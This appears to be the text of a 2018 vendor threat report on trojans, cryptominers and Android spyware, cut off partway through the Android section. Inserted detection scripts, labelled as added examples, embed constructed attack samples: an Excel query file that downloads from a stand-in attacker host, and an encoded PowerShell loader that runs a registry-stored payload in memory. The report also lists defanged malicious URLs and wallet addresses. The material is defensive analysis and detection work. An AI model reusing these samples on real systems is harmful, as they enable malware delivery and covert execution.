Global Threat Report Q2 2018 Edition (comodo.com)
Comodo Security Solutions Inc, 1255 Broad Street, Clifton NJ 07013, United States. Tel +1 (888) 551 1531, Tel +1 (888) 266 6361, Int +1 (703) 581 6361, Fax +1 (973) 777 4394, sales@comodo.com
© 2018 All Rights Reserved, Comodo Security Solutions Inc
Global Threat Report
Brought to you by
Q2 2018 Edition
Global Threat Report Q2 2018 Edition
Page 1 of 73
Table of Contents
1 EXECUTIVE SUMMARY ... 3
  1.1 Overview ... 3
  1.2 New Trends ... 3
    1.2.1 Trojans jumped to the top of the malware list ... 3
    1.2.2 Cryptominers evolved into multifunctional malware ... 3
    1.2.3 Android malware skyrocketed in variety ... 3
    1.2.4 Geopolitical intelligence ... 3
2 TROJANS GOING ON THE OFFENSIVE TO HUNT FOR CONFIDENTIAL DATA ... 4
  2.1 The most widespread trojan ... 7
  2.2 PowerShell-based attack with Emotet ... 8
  2.3 Flawed Ammyy RAT attack based on legitimate software ... 12
  2.4 The growth of Flawed Ammyy attacks for Q2 ... 15
  2.5 Ammyy Admin dissemination around the world for Q2 ... 15
3 CRYPTOMINER EVOLUTION: GOING FILELESS, KILLING COMPETITORS, CRASHING SYSTEMS ... 16
  3.1 BadShell attacks enterprises ... 16
  3.2 WinstarNssmMiner: a system killer ... 19
  3.3 CoinMiner kills rivals ... 20
  3.4 CoinHive changes its skin ... 22
  3.5 Cryptocurrency clipboard hijacker intercepts transfers ... 24
4 ANDROID DEVICES UNDER SIEGE ... 26
  4.1 Spying, stealing, mining ... 26
    4.1.1 KevDroid ... 27
    4.1.2 Zoo Park ... 29
    4.1.3 MikeSpy ... 30
    4.1.4 Xloader ... 30
    4.1.5 Stalker Spy ... 31
    4.1.6 Mystery Bot ... 32
    4.1.7 FakeSpy ... 33
    4.1.8 RedAlert ... 34
    4.1.9 Hero Rat ... 34
    4.1.10 Sonvpay ... 35
    4.1.11 CoinHive ... 36
  4.2 Android malware catalogued by month ... 37
    4.2.1 April 2018 ... 37
    4.2.2 May 2018 ... 37
    4.2.3 June 2018 ... 38
5 MALWARE IN Q2 2018: THE BIG PICTURE ... 39
  5.1 Strategic threat: computer worms ... 40
    5.1.1 Generic Worms ... 41
    5.1.2 Net Worms ... 42
    5.1.3 Email Worms ... 43
    5.1.4 P2P Worms ... 44
    5.1.5 IM Worms ... 45
  5.2 High threat malware ... 46
    5.2.1 Backdoors ... 47
    5.2.2 Viruses ... 48
    5.2.3 Trojans ... 49
    5.2.4 Exploits ... 50
  5.3 Medium threat malware ... 51
    5.3.1 Constructor ... 52
    5.3.2 Packers ... 53
    5.3.3 Email Flooder ... 54
    5.3.4 Virtual Tools ... 55
    5.3.5 Jokes ... 56
  5.4 Low threat malware: applications ... 57
    5.4.1 Applications ... 58
    5.4.2 Unwanted Applications ... 59
    5.4.3 Unsafe Applications ... 60
6 VERTICAL ANALYSIS ... 61
7 GEOPOLITICAL INTELLIGENCE ... 63
  7.1 USA ... 63
  7.2 China ... 64
  7.3 South Korea ... 65
  7.4 North Korea ... 66
  7.5 Armenia ... 67
  7.6 Belarus ... 68
  7.7 Iraq ... 69
  7.8 Ukraine ... 70
  7.9 Croatia ... 71
  7.10 Finland, Russia, USA ... 72
8 CONCLUSIONS ... 73
1 Executive Summary
1.1 Overview
• In Q2 Comodo Cybersecurity detected approximately 400 million unique malware samples all over the world.
• The malware was detected in 237 countries' top-level domains.
• Russia, Turkey and India were the countries with the highest number of worm infections.
• The United Kingdom had the highest proportion of detected backdoors.
• Ukraine and Russia were the most common countries of detection for viruses.
• Germany was the #1 country hit by trojans.
1.2 New Trends
1.2.1 Trojans jumped to the top of the malware list
The most dangerous sign is the unfolding merger of trojans and phishing emails, which amplifies the spread of the malware. Attackers use trojans to deliver other malware, and the trojan surge accompanies a significant increase in other malware infections. As such, users are facing a new challenge in the form of massive attacks implanting hidden malware with long-term activity.
1.2.2 Cryptominers evolved into multifunctional malware
Cryptomining decreased in quantity but grew in harmful capabilities. As events in Q2 demonstrated, this genre of malware is actively developing in two directions: better hiding and stronger persistence. Cryptominers have gained new features that let them fight antiviruses and root deeply into users' systems.
1.2.3 Android malware skyrocketed in variety
In Q2 the Comodo Threat Research Labs observed a huge spike in Android malware development. Android devices have become attractive targets for cybercriminals because a modern mobile device represents a treasure trove of data. Spyware takes the lead among Android malware types. Like real-world spies, Android spyware constantly changes guises and methods of avoiding detection, and its harmful potential goes up with every new version.
1.2.4 Geopolitical intelligence
Cyberattacks and malware spikes are often correlated with significant events in world politics. The appointments of the US Secretary of State and CIA Director, Armenia's political revolution, the Donald Trump and Vladimir Putin summit in Helsinki, the Champions League final in Ukraine, US-South Korean joint military exercises, the anniversary of the 1989 Tiananmen Square protests and other events during Q2 2018 clearly demonstrate the existence of such correlations.
2 Trojans going on the offensive to hunt for confidential data
The second quarter of 2018 brought a sudden change in the malware competition. Trojans squeezed out other malware types and jumped to the top of the charts. Having gained the lion's share of the malware marketplace, they can radically influence the cybersecurity landscape. Their appearance forces cybersecurity departments and individual users to update their defense tactics.
Malware Distribution by Type
Why are these changes inevitable?
Trojans are a special kind of malware. Their distinguishing feature is universality: they are most effective at providing a diversity of attacks, from stealing data and implanting ransomware, adware or cryptominers to completely crashing systems.
Another special feature of trojans is covert activity. The owner of a trojan-infected machine can remain unaware of the attack for a long time, during which the trojan is an active malefactor.
Hence the need for a new approach to defense tactics. Let's have a closer look at the most active vicious players of the trojan team, to understand in depth what harm they can do to your computers if they sneak inside.
Distribution of top 30 Malware Families
In this list of the 30 top malware families, where trojans overwhelmingly dominate, you can find samples exhibiting diverse types of malicious activity.
For example, the leader of the attacks in Q2, TrojWare.Win32.Agent, is a trojan family that clandestinely penetrates users' computers and then downloads other malware from a cybercriminal server. The downloaded malware can be of any type.
Number two in the list, TrojWare.JS.Clickjack, exhibits different activity: it makes users unintentionally click on hidden links. The link can be just another advertisement or lead to a malicious website that infects users with other types of malware.
TrojWare.JS.Faceliker simply clicks posts on Facebook on behalf of the user to promote fake or fraudulent pages. The malware infects users' browsers when they visit malicious or compromised websites; then, when infected users open Facebook, Faceliker hijacks their "likes".
TrojWare.Win32.Kryptik steals information from computers and sends it to the cybercriminals' Command-and-Control server.
TrojWare.Win32.Injector uses process injection as its main technique to take malicious actions. It is mostly used to bypass security products.
TrojWare.JS.Downloader consists of scripts that download and execute malware from the Internet. It is usually spread via a phishing email.
Such diversity of malicious activity and their special ability to hide have always made trojans one of the hardest kinds of malware to fight. But in Q2 2018 they became even more sophisticated and dangerous: Comodo Cybersecurity Threat Research Labs observed especially alarming trends worthy of attention from the global cybersecurity community.
First among the trends is an explosive mixture of trojans and phishing emails. Earlier, phishing emails mostly contained a link to a malicious website to lure victims into supplying their credentials. But today phishing emails have become a potent means of delivery for trojans and other malware. These trojans steal credentials and private information by ferreting through infected machines in search of valuable data, then send it to cybercriminals' servers.
The accompanying graph shows the most popular malware spread via email. Note that 18 of 20 are trojans.
Distribution of Phishing Families of Malware
2.1 The Most Widespread Trojan
The most proliferated trojan, TrojWare.Win32.Injector, is designed to steal credentials from infected computers. It was spread via a fake email imitating a message from a shipping and trading company. As seen in the screenshot, the attached malware is carefully disguised with a plausible name and icon to look like a real scanned document.
If a user takes the bait and runs the file, it copies itself to %AppData% as D5E2DEE36C7A.exe, then launches itself from that location and starts to gather credentials present in the system.
It collects credentials and private data from known browsers, email clients, FTP clients, WebDAV and SCP clients. Then it sends all the collected data to the attackers' server, httpcallbedmlpackfarefrephp.
The phishing email
2.2 PowerShell-based attack with Emotet
Another alarming trend is related to the malware itself rather than its delivery method. Often cybercriminals use malware based not on Windows native exe files but on PowerShell scripts and other legitimate software to infect a computer. This type of attack is much harder to detect with antivirus tools.
Emotet is one of the most aggressive trojans currently acting in cyberspace. Spread by various infection vectors and backed by a huge network of compromised hosts, it heavily affects many individuals and companies.
The following attack started with an email that imitated a message from the IRS about a "Tax Account Transcript". Notice the message is written in a cheerful manner to inspire user trust.
The phishing email
The attached file is an Office document containing a VBScript. As the default settings of a newly installed Microsoft Office do not allow execution of such scripts, the attackers added a special prompt to convince the victims to turn on VBScript execution.
The special prompt to convince the victims to turn on VBScript execution
The purpose of the VBScript is to launch PowerShell.
The malware downloads itself to a temporary folder and executes binaries located at the following (defanged) URLs: hxxpwwwiyilikleralemicomGtXvlc, hxxpwwwthecyberconxioncomPUqUUe, hxxpEliasWesselcomvu6xGmS, hxxpmossbeachmusicdeXuBBN6r, hxxpairmaxxrswIdY.
At the time of writing, only the thecyberconxion.com host was serving a malware binary (SHA1 5974190561e707f63d776e55336841bd871eebdb).
The binary moves itself to C:\Windows\SysWOW64\lanesviewer.exe and creates a service "lanesviewer" to ensure persistence.
The malware creates the "lanesviewer" service to ensure persistence
After that, Emotet begins its real mission: stealing private data from the compromised system, which it then sends to the cybercriminals' Command & Control server.
The next example is even more cunning, because it infects computers with popular, legitimate Microsoft software.
2.3 Flawed Ammyy RAT attack based on legitimate software
The Flawed Ammyy trojan has a nefarious and diverse background of use in cyberattacks. What is most impressive is that it is based on legitimate software called Ammyy Admin. Its history is a striking example of how malicious hackers turn legitimate tools into a thief's tools.
Ammyy Admin is remote desktop software created by the Ammyy Group company. It provides an easy way to establish a reliable remote desktop connection, connecting remote computers within seconds without additional installation or configuration work.
The dark side of this tool is that its features ideally suit the purposes of cybercriminals. Unsurprisingly, perpetrators tried to adopt it for their malicious activity. Cybercriminals repeatedly compromised the Ammyy Group website and replaced the original Ammyy Admin software with a bundle containing malware. Thus every user who downloaded Ammyy Admin became covertly infected. Ammyy Group cleaned up the compromised website, but the attackers infected it again, and this vicious cycle continued endlessly.
As you can see on the diagram, Ammyy Admin was used in spreading many types of nefarious malware.
The newest malicious modification of Ammyy Admin is called Flawed Ammyy. It is a remote access trojan (RAT) that appeared in the wild at the beginning of 2016. It got its name from the leaked source code of the third Ammyy Admin version. Flawed Ammyy RAT lets the attackers use functions such as Remote Desktop control, File System Manager, proxy support and audio chat. Cybercriminals take total control of the infected host and can run amok: steal credentials and documents, remove or add files, run applications, install other malware, etc.
The way Flawed Ammyy was spread in the second quarter deserves special attention, because it used a new trick to infect users. What is especially worth noticing is that this trick is also based on using legitimate software, Microsoft's this time.
Flawed Ammyy is delivered to the victims through phishing emails with an IQY file attachment, as in the following screenshot.
The phishing email
IQY files are intended for making an Internet query from MS Excel, so an IQY contains a URL and other related parameters. It can download files and run them directly in MS Excel.
The infected IQY included a malicious URL, so it runs a chain of malicious files that results in downloading and running Flawed Ammyy via Windows PowerShell.
Malware runs PowerShell
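An added example (not from the report or from Comodo's tooling) of how a mail gateway could triage .iqy attachments of the kind described above: it parses the standard IQY layout (query type, format version, URL, then Key=Value parameters) and flags queries that would make Excel fetch content from a host outside an allowlist. The sample attachments, the allowlisted intranet host and the attacker domain are constructed placeholders.

```python
"""Triage Excel Web Query (.iqy) attachments before they reach a mailbox.

Added example, not Comodo's tooling. The .iqy layout assumed here is the
standard one: line 1 the query type ("WEB"), line 2 the format version ("1"),
line 3 the URL Excel will fetch, then an optional blank line and Key=Value
parameters. The sample attachments and the allowlist are constructed.
"""
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Hosts an organisation actually expects Excel to pull query data from (constructed).
ALLOWED_HOSTS = {"reports.example-intranet.local"}


@dataclass
class IqyVerdict:
    query_type: str
    url: str
    params: dict = field(default_factory=dict)
    reasons: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def parse_iqy(text: str) -> IqyVerdict:
    """Split an .iqy body into its query type, URL and Key=Value parameters."""
    lines = [ln.strip() for ln in text.splitlines()]
    lines = [ln for ln in lines if ln]  # drop the blank separator line(s)
    if len(lines) < 3:
        raise ValueError("not a complete .iqy file")
    query_type, _version, url = lines[0], lines[1], lines[2]
    params = {}
    for ln in lines[3:]:
        key, _, value = ln.partition("=")
        params[key.strip()] = value.strip()
    return IqyVerdict(query_type=query_type, url=url, params=params)


def assess_iqy(text: str, allowed_hosts=ALLOWED_HOSTS) -> IqyVerdict:
    """Flag .iqy files whose query would pull content from outside the allowlist."""
    verdict = parse_iqy(text)
    target = urlparse(verdict.url)
    if verdict.query_type.upper() != "WEB":
        verdict.reasons.append(f"unexpected query type {verdict.query_type!r}")
    if target.scheme not in ("http", "https"):
        verdict.reasons.append(f"non-web scheme {target.scheme!r}")
    host = (target.hostname or "").lower()
    if host not in allowed_hosts:
        verdict.reasons.append(f"external host {host!r}")
    return verdict


# Constructed samples: a benign internal query and a phishing-style one whose
# URL points at an attacker-controlled host (placeholder domain, not an
# indicator taken from the report).
BENIGN_IQY = (
    "WEB\n1\nhttps://reports.example-intranet.local/q1.iqy\n\n"
    "Selection=AllTables\nFormatting=None\n"
)
PHISH_IQY = (
    "WEB\n1\nhttp://attacker.invalid/2.dat\n\n"
    "Selection=AllTables\nFormatting=None\n"
)

if __name__ == "__main__":
    for name, body in (("benign", BENIGN_IQY), ("phish", PHISH_IQY)):
        v = assess_iqy(body)
        print(name, v.url, "SUSPICIOUS" if v.suspicious else "ok", v.reasons)
```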
Thus in this case machines face extremely dangerous and potent malware created and delivered via legitimate software. This feature makes it much harder for antivirus software to detect an attack.
2.4 The growth of Flawed Ammyy attacks for Q2
The growth of Flawed Ammyy attacks for Q2
2.5 Ammyy Admin dissemination around the world for Q2
As illustrated, trojans became an 800-pound gorilla in the malware market in Q2. This trend will inevitably entail a change of attack vectors toward covert theft and manipulation of users. This trend is a real gift for cybercriminals and a terrible nightmare for users.
Trojans let attackers gain time. As the malware acts covertly, cybercriminals have more than enough time to use stolen data to their advantage. In many cases attacks are discovered only when it is too late: after money is withdrawn from a bank account, confidential data is published, etc. The merging of trojans as payloads and phishing emails as a means of delivery observed during Q2 will result in a huge surge in such attacks and victims. And using legitimate tools like PowerShell for running malware will amplify the number of victims even more, because such attacks are much harder to detect with antiviruses.
To fight these attacks, cybersecurity departments need to rearrange their approach to security measures according to the new trends above. Combining the best malware detection tools with methods of protecting data built on defense-in-depth principles provides the most promising solution.
[Chart, section 2.4: Flawed Ammyy attacks per month in Q2 2018. Apr: 43188; May: 46382; Jun: 48881]
3 Cryptominer Evolution
Going Fileless, Killing Competitors, Crashing Systems
Cryptominers do not lead the Q2 malware pack, but that does not mean their impact is greatly diminished. On the contrary, current cryptominer behavior recalls that of an army preparing for battle: training and reprovisioning to fight more efficiently. Cryptominers are quickly developing and gaining new dangerous abilities.
Earlier cryptomining examples were only able to use infected machine resources to mine cryptocurrency on behalf of the attackers. For that reason many users did not regard them as particularly dangerous: at least cryptominers would not steal information or destroy data like other malware, merely sucking up CPU resources. Moreover, they typically did not employ strong obfuscation and could be easily discovered and deleted.
But Q2 events clearly showed that the situation has radically changed.
New samples of cryptominers detected by Comodo malware analysts exhibit far more harmful abilities than those required for merely mining cryptocurrency. These samples clearly show that cryptominers are transforming into a sophisticated and multifunctional weapon for cybercriminals. They are learning to hide and to fight against antimalware tools. They can camouflage themselves, kill competing cryptominers and even crash user systems if met with an attempt to delete the malware.
3.1 BadShell attacks enterprises
Fileless malware is next-generation malware, especially compared with traditional infection via exe files. File-based malware resides on the hard drive, making it easier to detect. But fileless malware is different: as its name suggests, this type of malware is malicious code injected into legitimate OS processes. It need not be installed on a victim machine but functions only in memory, making it much harder for antiviruses to detect.
Usually such malware is spread via malicious ad banners. Clicking on a banner redirects a user to an infected website, where the malware covertly installs itself on the victim's computer. As many antivirus tools cannot detect it, users remain unaware of being infected. Not surprisingly, its use by cybercriminals is on the increase.
Last quarter Comodo Threat Research Labs analysts faced a scenario of just such an attack. A company with several thousand endpoints was compromised by fileless malware. When their legacy security software failed to protect them, the company looked to Comodo Threat Research Labs for assistance.
Comodo analysts revealed that the malware was a cryptominer that utilized legitimate Windows processes: PowerShell to execute commands, Task Scheduler to ensure persistence and the Registry to hold the malicious binary code. In the screenshots below you see exactly how the malware, dubbed BadShell, works.
If we decode the PowerShell arguments, we see the malicious code in the registry. The code is injected into an existing running process by the PowerShell script.
BadShell at work
The malicious code in the registry
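As an added example (not the report's or Comodo's analysis code), the following decodes a PowerShell -EncodedCommand argument the way the analysts did above and scores a scheduled-task command line for the BadShell pattern: hidden launch, payload read from the registry, base64-decoded and run in memory. The task command lines, registry path and value name are constructed placeholders; the decoder itself handles the real encoding, base64 over UTF-16LE.

```python
"""Spot BadShell-style scheduled tasks: PowerShell launched with an encoded
command that pulls a payload out of the registry and runs it in memory.

Added example, not Comodo's analysis tooling. The task command lines below
are constructed (the real task and registry value names are not in the
report); the decoder handles the genuine -EncodedCommand encoding,
base64 over UTF-16LE.
"""
import base64
import re
from typing import Optional

# Markers a defender expects in a registry-resident, inject-into-process loader.
REGISTRY_READ = re.compile(r"Get-ItemProperty|\[Microsoft\.Win32\.Registry\]", re.I)
DECODE_BLOB = re.compile(r"FromBase64String", re.I)
IN_MEMORY_EXEC = re.compile(
    r"Invoke-Expression|\bIEX\b|VirtualAlloc|CreateRemoteThread", re.I
)
HIDDEN_LAUNCH = re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-noni\b", re.I)
# -e, -enc and -EncodedCommand all accept the base64 argument.
ENC_FLAG = re.compile(r"-e(nc(odedcommand)?)?\s+([A-Za-z0-9+/=]+)", re.I)


def encode_command(script: str) -> str:
    """Produce what `powershell -EncodedCommand` expects (used to build samples)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(cmdline: str) -> Optional[str]:
    """Return the decoded script if the command line carries an encoded command."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(3)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def assess_task(cmdline: str) -> dict:
    """Score one scheduled-task command line; a score of 3 or more is BadShell-like."""
    script = decode_command(cmdline)
    findings = []
    if HIDDEN_LAUNCH.search(cmdline):
        findings.append("hidden/non-interactive launch")
    if script is not None:
        findings.append("encoded command")
        if REGISTRY_READ.search(script):
            findings.append("reads payload from registry")
        if DECODE_BLOB.search(script):
            findings.append("decodes base64 blob")
        if IN_MEMORY_EXEC.search(script):
            findings.append("in-memory execution/injection")
    return {"decoded": script, "findings": findings, "score": len(findings)}


# Constructed sample modelled on the report's description: read a registry
# value, base64-decode it, run it in memory. Key and value names are placeholders.
SAMPLE_SCRIPT = (
    "$b=(Get-ItemProperty 'HKCU:\\Software\\PLACEHOLDER').Payload;"
    "IEX ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String($b)))"
)
BADSHELL_TASK = (
    "powershell.exe -NoP -NonI -W Hidden -EncodedCommand "
    + encode_command(SAMPLE_SCRIPT)
)
BENIGN_TASK = "powershell.exe -File C:\\Scripts\\rotate-logs.ps1"

if __name__ == "__main__":
    for task in (BADSHELL_TASK, BENIGN_TASK):
        result = assess_task(task)
        print(result["score"], result["findings"])
```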
This emergency clearly demonstrates how dangerous cryptominer activity can be. Just imagine it: the entire compute capacity of the enterprise's computers was engaged in mining cryptocurrency, depriving employees of the ability to perform their jobs. Comodo analysts took over the situation and cleaned the infection from all involved computers, but of course the company's financial losses were irreversible.
Invulnerability to antivirus and persistence in the system are the most important attributes for a cryptominer, because the longer it runs within the infected system, the more it profits the attackers. That is why cybercriminals give special attention to a cryptominer's ability to elude antivirus software.
Below is another cunning technique that turns an infected machine into a slave of the attacker.
3.2 WinstarNssmMiner: a system killer
Like other cryptominers, WinstarNssmMiner is purposed to steal computer resources to mine cryptocurrency coins for cybercriminals. But it has a special feature: it can root into a system so deeply that it becomes unremovable. Attempting to kill it will kill the target system totally.
The secret of WinstarNssmMiner's persistence lies in its method of infecting a victim's computer. It consists of two processes injected into two system svchost.exe processes. The first performs the main task, mining cryptocurrency. The other runs in the background, looking for antivirus products and disabling them.
The malicious code disguised as svchost.exe
Especially impressive is that both infected svchost.exe processes possess the system attribute "CriticalProcess", meaning that terminating either of them will crash the system, leaving the user with a blue screen.
WinstarNssmMiner spreading around the world
Cryptominers can kill not only victims' systems but also their cryptomining competitors.
3.3 CoinMiner kills rivals
CoinMiner stands out from other cryptominers with a kill-list feature that checks the infected machine for the presence of other cryptomalware. If an "alien" cryptominer is detected, the feature terminates its processes.
CoinMiner kills its rivals as follows.
The code below downloads CoinMiner for the Windows architecture (x86 or x64) and then checks if a miner is already running by testing for the presence of an "AMDDriver64" process.
The code downloads CoinMiner and checks if a miner is already running
The malware maintains two lists, named $malwares and $malwares2, with the names of the processes it is instructed to kill. The lists include other types of cryptominers.
In this way CoinMiner undividedly occupies the victim's computer to use its resources for mining cryptocurrency.
Some cryptominers earned the spotlight of the mass media and cybersecurity researchers, easing user detection. In Q2 these cryptominers learned to hide; CoinHive is the brightest example of them.
3.4 CoinHive changes its skin
CoinHive is a popular JavaScript cryptominer. If you put its string of code into your website page, every visitor to the site will mine coins for you.
As you can see, the CoinHive script is easily detected.
The CoinHive script
After many publications on this subject in the mass media and cybersecurity reports, users have started checking website code for cryptominers. But in the second quarter perpetrators found a way to overcome this obstacle. Now they use a sneaky trick to camouflage the CoinHive presence with URL shorteners.
As a result, the malicious code on a webpage looks like this:
The obfuscated malicious code on a webpage
If we decode the string, we encounter an iframe.
The iframe loads the URL shortener. Notice the width and height of the iframe are set to 1 to make the iframe as invisible as possible.
Now let's look at the URL https://cnhv.co
And there we can find the familiar link to CoinHive.
The link to CoinHive
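An added example (not from the report) that automates the check walked through above: it decodes atob()/unescape() string literals found in a page, parses any iframe they hide, and reports frames pointing at cnhv.co or coinhive.com together with whether they use the 1x1 trick. The sample page and the shortener path are constructed.

```python
"""Find CoinHive loaders hidden behind an encoded 1x1 iframe to a URL shortener.

Added example, not Comodo's tooling. The sample page is constructed; the
cnhv.co shortener and the 1x1 iframe trick are what the report describes.
"""
import base64
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

MINER_HOSTS = {"cnhv.co", "coinhive.com"}

# String literals handed to the browser's decoders; the page text that hides
# the iframe is usually wrapped in one of these before document.write().
B64_LITERAL = re.compile(r"atob\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.I)
PCT_LITERAL = re.compile(r"unescape\(\s*['\"]([^'\"]+)['\"]\s*\)", re.I)


def decode_layers(html: str) -> list:
    """Return fragments hidden in atob()/unescape() literals, peeled recursively."""
    out = []
    for m in B64_LITERAL.finditer(html):
        try:
            out.append(base64.b64decode(m.group(1)).decode("utf-8", "replace"))
        except ValueError:
            continue
    for m in PCT_LITERAL.finditer(html):
        out.append(unquote(m.group(1)))
    # A decoded layer may itself wrap another atob()/unescape() call.
    nested = [frag for layer in out for frag in decode_layers(layer)]
    return out + nested


class _IframeCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append(dict(attrs))


def find_hidden_miners(html: str) -> list:
    """Flag iframes (visible or decoded) pointing at a miner host, with size info."""
    hits = []
    for fragment in [html] + decode_layers(html):
        collector = _IframeCollector()
        collector.feed(fragment)
        for frame in collector.iframes:
            src = frame.get("src") or ""
            host = (urlparse(src).hostname or "").lower()
            if host not in MINER_HOSTS:
                continue
            tiny = frame.get("width") in ("0", "1") and frame.get("height") in ("0", "1")
            hits.append({"src": src, "host": host, "hidden_1x1": tiny})
    return hits


# Constructed sample: the 1x1 frame to the shortener is base64-wrapped in a
# script, so a plain search of the page source shows no miner. The shortener
# path is a placeholder, not a link taken from the report.
HIDDEN_IFRAME = '<iframe src="https://cnhv.co/PLACEHOLDER" width="1" height="1"></iframe>'
SAMPLE_PAGE = (
    "<html><body><p>Welcome</p><script>document.write(atob('"
    + base64.b64encode(HIDDEN_IFRAME.encode()).decode()
    + "'));</script></body></html>"
)
CLEAN_PAGE = (
    "<html><body><iframe src='https://videos.example.org/embed' "
    "width='640' height='360'></iframe></body></html>"
)

if __name__ == "__main__":
    print(find_hidden_miners(SAMPLE_PAGE))
    print(find_hidden_miners(CLEAN_PAGE))
```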
What is the impact of this trick? In a simple scenario, a user visits a CoinHive-infected website. Noticing that her computer's CPU is overloaded, she decides to check the webpage code but doesn't find any signs of a cryptominer. So she concludes that something went wrong with her PC, while CoinHive co-opts her computer to mine cryptocoins.
The next malware in the row prefers not mining cryptocurrency but stealing it on the fly.
3.5 Cryptocurrency clipboard hijacker intercepts transfers
It would be more accurate to call this program a cryptothief rather than a cryptominer, because it does not devour an infected machine's resources but instead actually steals cryptocurrency, redirecting it to the perpetrator.
Cryptocurrency transfers require a wallet address. The address is a long string of mixed characters and numbers, so it is almost impossible to remember or fill in manually. That is why users usually copy-paste a wallet address to make a transaction. Cybercriminals regard this copy-paste process as a breach they can use to their advantage.
The cryptocurrency clipboard hijacker checks the clipboard for a copied wallet address. Upon finding one, it changes it to the address of a wallet under the attacker's control. So an unaware owner of the infected machine delivers cryptocoins straight into cybercriminals' hands.
A new Cryptocurrency Clipboard Hijacker sample can monitor 2343286 addresses
This malware is distributed in a bundle with the All-Radio 4.27 Portable software. All-Radio 4.27 is a legitimate video and audio player created by Russian developers, but cybercriminals copied the program and added malicious code. The malicious version of All-Radio 4.27 was used for spreading different types of malware, clipboard cryptocurrency hijackers among them.
Here is an example of a clipboard hijacker attack.
A user copied the wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs, but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm.
An example of a clipboard hijacker attack
Spreading of Clipboard Hijacker malware around the world
Although cryptominers have decreased in quantity, they seem to be coming back in an updated disguise and promise to become a new serious challenge for cybersecurity departments and vendors.
4 Android Devices Under Siege
4.1 Spying, Stealing, Mining
Android devices are rapidly becoming high-value targets for cybercriminals and malware authors. It is not surprising, because today almost any smartphone is a treasure trove of information for perpetrators. People increasingly use smartphones for financial operations, but those are not the only jackpot for attackers: today every smartphone contains a plethora of confidential information about its owner.
If the victim is a CEO, politician or other VIP, the content of the mobile device can be sold at the highest prices. Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims. Of course, not only cybercriminals hunt for smartphone content: intelligence agencies and business competitors want to know everything about their targets. Add jealous spouses tracking every move of their partners and parents wanting to control their children, and you will easily understand why Android-oriented malware is a growing business.
Today spying is the number one purpose of Android malware. In Q2 Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them. You can see the whole family of these digital spooks on the graph.
The digital spooks
Like real-world spies, digital agents impersonate legitimate entities, pretending to be innocent applications or hiding malicious code inside legitimate software. Like real spies, they seek to remain invisible, constantly change disguises to avoid detection and hone their tradecraft from version to version.
4.1.1 KevDroid
The first is named KevDroid. It is distributed in three versions:
Version-1: Naver Defender
Version-2: Netease Defender
Version-3: PU
Disguises of KevDroid
The first version, disguised as the Naver Defender application, covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection. This sample has multifunctional abilities for spying. It steals account details: contacts, id, name, phone numbers and email address of the owner. It grabs SMS messages and associated info. It attempts to read call logs (number, name, type, duration), emails (email, type) and photos of the contacts. After extracting all the data, the malware encrypts it with the "AES" algorithm and sends it to the attackers' server httphttpcgalimcomadminhrpupuphpdo=upload.
KevDroid records the victim's every phone call, then encrypts and uploads it to the cybercriminals' server. In addition, it collects information about currently running services, installed apps and the launcher name.
The second version, Netease Defender, has additional spying abilities. It takes control of the device camera and covertly records the victim's activity, then sends the video to the attackers' server.
Version-3 of KevDroid takes photos, records calls and creates a list of files on the device. It also extracts the web history, account and contact details and the device information.
People assume they are safe if they download apps exclusively from the official Google Play store. This wrong assumption can be costly: the first version of the Desert Scorpion spyware was spread via official Google Play Services. The spyware was camouflaged as a chat app called Dardesh Instant App. But when a user downloaded and ran it, the app covertly connected to
the cybercriminals' Command and Control server and downloaded the spyware onto the device. From that moment the spyware constantly kept track of all events on the infected device. Another means of the malware's dissemination was social networks.
Version-1: Dardesh, Google Play Services, Instant Apps
Version-2: Settings
Disguises of Desert Scorpion
The second version of Desert Scorpion records calls, audio and video, uninstalls other apps, sends and receives messages and tracks the location of the smartphone. It is included in some spyware tools like FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts the metadata and makes changes on the victim device.
4.1.2 Zoo Park
The next member of the spy family, Zoo Park, has 4 different versions:
Version-1: Telegram Groups, انتخاب دھم
Version-2: Postrall, Yes For Referendum, انتخاب دھم
Version-3: Celebs Gone Wild, جریدة النھار الكویتیة, 剑侠挂机
Version-4: VPN Easy, DroFirewall, m_android
Disguises of Zoo Park
The first version tries to impersonate the Telegram app. It extracts Accounts and Contacts details, encodes them with Base64 and sends them to the attackers' server. The second version has additional abilities: extracting SMS details, device information (including IMEI, Network Operator Name, SDK version, OS version, etc.), Call Log details and External Storage content.
The third version is included in spyware named "Spymaster Pro" and can:
• Enable and disable the GPS services
• Record audio and send it to the Command & Control server
• Upload image files
• Collect information about the applications installed
• Collect browser data
• Send SMS and read outgoing SMS
The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy, DroFirewall, etc.
In addition to the abilities of previous versions, it includes some additional tricks:
• Extracts photos, audio and video
• Records the screen
• Executes shell commands
• Records calls
4.1.3 MikeSpy
Some spyware examples specifically hunt for messenger data, like the next digital spook, MikeSpy.
Virtual Girlfriend
Disguises of MikeSpy
MikeSpy camouflaged itself as a Virtual Girlfriend application. But instead of a girlfriend it has a bundle of malicious abilities:
• Takes control of the Bluetooth adapter
• Extracts data about accounts, contact details and installed apps
• Extracts data from the WhatsApp message DB and related keys
• Uploads collected data to the cybercriminals' server via FTP
4.1.4 Xloader
The next spyware, Xloader, combines spying with purposeful hunting for banking applications on the device. It has trust-inspiring cover icons imitating Facebook and Google Chrome.
Version-1 to Version-3: FaceBook, Chrome
Disguises of Xloader
After infection Xloader connects to its CampC server and executes the following commands
Extract the device information
Delete SMS
Set ringer mode
Monitor incoming SMS messages
Clear memory
